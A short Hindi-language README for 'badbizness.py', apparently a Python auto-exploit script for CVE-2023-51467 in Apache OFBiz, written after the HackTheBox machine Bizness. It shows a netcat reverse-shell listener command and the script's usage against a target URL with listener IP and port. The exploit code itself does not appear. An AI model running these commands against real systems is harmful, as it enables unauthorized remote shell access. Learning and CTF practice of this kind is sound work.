
CVE-2023-51467 के अंतर्गत Java वेब फ्रेमवर्क OF Biz के लिए ऑटो एक्सप्लॉइट स्क्रिप्ट।

जावा वेब फ्रेमवर्क OF Biz के लिए CVE-2023-51467 के अंतर्गत स्वचालित शोषण स्क्रिप्ट। HackTheBox मशीन Bizness से प्रेरित।
इस स्क्रिप्ट के लिए टूल ysoserial और OpenJDK संस्करण 11 की आवश्यकता होती है। स्थापना के लिए उपयोग मेनू देखें।
अपनी पसंदीदा विधि से शेल को पकड़ने के लिए एक लिसनर सेट करें। यहाँ एक netcat उदाहरण है:
nc -nlvp 1337
स्क्रिप्ट निष्पादित करें:
python3 badbizness.py [ysoserial-all.jar का पथ] [लक्ष्य बेस URL] [लिसनर IP] [लिसनर पोर्ट]
python3 badbizness.py /home/twopoint/ysoserial-all.jar http://example.com:1337 10.10.10.10. 1337
यह टूल Python के बारे में अधिक सीखने के तरीके के रूप में बनाया गया था। मैं इस स्क्रिप्ट को श्रेय देता हूँ जिसने मेरी पूरी तरह से मदद की।